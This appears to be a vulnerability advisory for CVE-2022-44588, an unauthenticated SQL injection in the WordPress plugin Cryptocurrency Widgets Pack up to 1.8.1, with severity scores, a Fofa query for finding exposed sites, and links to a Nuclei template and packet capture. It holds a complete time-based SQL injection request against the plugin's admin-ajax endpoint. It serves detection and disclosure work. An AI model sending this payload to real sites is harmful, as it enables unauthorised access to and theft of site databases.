| Title | Cryptocurrency Widgets Pack <= 1.8.1 - SQL Injection |
|---|---|
| Author | Shivam Kamboj |
| Severity | Critical |
| Impact | Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion of sensitive information. |
| Remediation | Update to the latest version of the plugin where the vulnerability is fixed. |
| CVSS Score | 9.8 |
| EPSS Score | 0.33174 |
| CVE ID | CVE-2022-44588 |
| CWE ID | CWE-89 |
| Fofa Query | body="wp-content/plugins/cryptocurrency-widgets-pack" |
| Tags | cve cve2022 wordpress wp wp-plugin sqli cryptocurrency-widgets-pack unauth |
Cryptocurrency Widgets Pack Plugin <=1.8.1 for WordPress contains an unauthenticated SQL injection caused by unsanitized user input in database queries, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&draw=1&start=0&length=10&columns[0][name]=EXP(~(SELECT*FROM(SELECT+SLEEP(8))x))&order[0][column]=0&order[0][dir]=ASC HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/59.0
Connection: close
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-44588.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-44588.pcap
N/AN/A